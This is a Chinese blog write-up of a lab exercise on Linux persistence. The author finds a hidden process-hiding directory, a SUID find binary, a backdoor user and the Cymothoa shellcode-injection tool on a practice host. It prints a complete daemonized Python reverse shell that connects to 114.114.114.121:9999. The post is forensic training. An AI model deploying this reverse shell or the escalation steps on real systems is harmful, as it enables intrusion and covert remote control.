玄机第三章权限维持-linux权限维持-隐藏

baozongwi Lv5
  2024-11-14 21:30:05 2024-11-14 21:30:05 Created   2024-11-15 08:42:25 2024-11-15 08:42:25 Updated      1.1k Words  5 Mins  

0x01

这里的话主要是考察文件路径的查杀吧,以及部分常用躲避查杀工具要知道就好找了

0x02 action

首先文件路径的话就那两个,一个/tmp一个/opt,这个我们是知道的,先链接

1
2
ssh -p 31476 root@env.xj.edisec.net
xjqxwcyc

查找隐藏文件的路径

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
find / -type f -name ".*" 2>/dev/null
# sys的太多了这是默认带的,过滤一下
find / -type f -name ".*" 2>/dev/null | grep -v "/sys/"

root@xuanji:~# find / -type f -name ".*" 2>/dev/null | grep -v "/sys/"
/etc/.pwd.lock
/etc/cron.d/.placeholder
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.monthly/.placeholder
/etc/cron.weekly/.placeholder
/etc/init.d/.legacy-bootordering
/etc/skel/.bash_logout
/etc/skel/.bashrc
/etc/skel/.profile
/etc/mysql/conf.d/.keepme
/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/root/.bashrc
/root/.profile
/root/.bash_history
/root/.viminfo
/tmp/.temp/libprocesshider/.gitignore
/.dockerenv

然后跟进这个tmp里面

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root@xuanji:/tmp/.temp/libprocesshider# ls
1.py  Makefile  README.md  processhider.c  shell.py
root@xuanji:/tmp/.temp/libprocesshider# cat 1.py
#!/usr/bin/python3

import socket,subprocess,os,sys, time

pidrg = os.fork()
if pidrg > 0:
        sys.exit(0)

os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
        sys.exit(0)

while 1:
        try:
                sys.stdout.flush()
                sys.stderr.flush()
                fdreg = open("/dev/null", "w")
                sys.stdout = fdreg
                sys.stderr = fdreg
                sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                sdregs.connect(("114.114.114.121",9999))
                os.dup2(sdregs.fileno(),0)
                os.dup2(sdregs.fileno(),1)
                os.dup2(sdregs.fileno(),2)
                p=subprocess.call(["/bin/bash","-i"])
                sdregs.close()
        except Exception:
                pass
        time.sleep(2)

直接拿到两个flag

1
2
flag{md5(/tmp/.temp/libprocesshider/1.py)}
flag{114.114.114.121:9999}

提权目前最常用的就是内核提权和suid提权,我们先看suid提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@xuanji:/tmp/.temp/libprocesshider# find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

里面有find,看看能不能用

1
2
root@xuanji:/tmp/.temp/libprocesshider# find . -exec ls \; -quit
1.py  Makefile  README.md  processhider.c  shell.py

那就是交这个了,尝试注入的工具,这个我们在tmp下面已经找不到了我们看看关键文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@xuanji:/tmp/.temp/libprocesshider# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
ctf:x:1000:33::/home/ctf:
sslh:x:104:108::/nonexistent:/bin/false

一看这个CTF就是后门用户,查看相关文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@xuanji:/tmp/.temp/libprocesshider# find / -user ctf 2>/dev/null
/home/ctf
/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/home/ctf/flag
/opt/.cymothoa-1-beta
/opt/.cymothoa-1-beta/Makefile
/opt/.cymothoa-1-beta/cymothoa.c
/opt/.cymothoa-1-beta/cymothoa.h
/opt/.cymothoa-1-beta/payloads/fork_shellcode.s
/opt/.cymothoa-1-beta/payloads.h
/opt/.cymothoa-1-beta/personalization.h

Cymothoa 是一款可以将 shellcode 注入到现有进程的(即插进程)后门工具。借助这种注入手段,它能够把shellcode伪装成常规程序。它所注入的后门程序应当能够与被注入的程序(进程)共存,以避免被管理和维护人员怀疑。将shellcode注入到其他进程,还有另外一项优势:即使目标系统的安全防护工具能够监视可执行程序的完整性,只要它不检测内存,那么它就不能发现(插进程)后门程序的进程。

1
2
3
4
5
6
root@xuanji:/tmp/.temp/libprocesshider# cd /opt/.cymothoa-1-beta
root@xuanji:/opt/.cymothoa-1-beta# ls
Makefile  bgrep.c  cymothoa    cymothoa.h             payloads    personalization.h  syscalls.txt  udp_server.c
bgrep     core     cymothoa.c  hexdump_to_cstring.pl  payloads.h  syscall_code.pl    udp_server

flag{md5(/opt/.cymothoa-1-beta/cymothoa)}

执行后门文件,这里我们就是找Python就可以了

1
2
root@xuanji:/opt/.cymothoa-1-beta# whereis python
python: /usr/bin/python3.4 /usr/bin/python3.4m /usr/bin/python /usr/bin/python2.7 /etc/python3.4 /etc/python /etc/python2.7 /usr/lib/python2.7 /usr/lib/python3.4 /usr/local/lib/python3.4 /usr/local/lib/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz

0x03

这里感觉更加需要对一些工具熟悉,还有就是路径的常见思路

  • Title: 玄机第三章权限维持-linux权限维持-隐藏
  • Author: baozongwi
  • Created at : 2024-11-14 21:30:05
  • Updated at : 2024-11-15 08:42:25
  • Link: https://baozongwi.xyz/2024/11/14/玄机第三章权限维持-linux权限维持-隐藏/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
玄机第三章权限维持-linux权限维持-隐藏
  1. 0x01
  2. 0x02 action
  3. 0x03